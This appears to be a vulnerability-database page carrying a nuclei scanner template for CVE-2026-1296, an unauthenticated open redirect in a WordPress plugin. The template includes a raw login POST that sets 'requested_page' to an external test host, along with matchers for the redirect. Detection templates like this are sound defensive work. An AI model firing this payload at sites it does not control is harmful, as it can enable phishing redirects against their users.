Lucene search
K

Frontend Post Submission Manager Lite <= 1.2.7 - Open Redirect

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 6 Views

Open redirect in Frontend Post Submission Manager Lite up to 1.2.7 allows unauthenticated redirects.

Related
Refs
Code
id: CVE-2026-1296

info:
  name: Frontend Post Submission Manager Lite <= 1.2.7 - Open Redirect
  author: Shivam Kamboj
  severity: medium
  description: |
    The Frontend Post Submission Manager Lite plugin for WordPress is vulnerable to Open Redirection in all versions up to, and including, 1.2.7 due to insufficient validation on the 'requested_page' POST parameter in the verify_username_password function. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action such as clicking on a link.
  impact: |
    Unauthenticated attackers can redirect users to malicious sites, potentially leading to phishing or malware exposure.
  remediation: |
    Update to a version later than 1.2.7 or the latest available version.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/frontend-post-submission-manager-lite/frontend-post-submission-manager-lite-127-unauthenticated-open-redirect-via-requested-page-parameter
    - http://nvd.nist.gov/vuln/detail/CVE-2026-1296
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-1296
    epss-score: 0.0046
    epss-percentile: 0.367
    cwe-id: CWE-601
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2026,wordpress,wp,wp-plugin,redirect,frontend-post-submission-manager-lite

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log=&pwd=&wp-submit=Log+In&action=login&requested_page=https://oast.pro

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.pro\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1

      - type: status
        status:
          - 302
# digest: 4a0a0047304502210093e41f3f6ac9333f7d01b526585646585b5fb422d0d94a7a54169783d1db392e02205225002390a7e9fe45bd816cfa3d02ce5a7da7550f6f4dd49e48957d24c95c8c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Mar 2026 16:03Current
6Medium risk
Vulners AI Score6
CVSS 3.16.1
EPSS0.0046
SSVC
6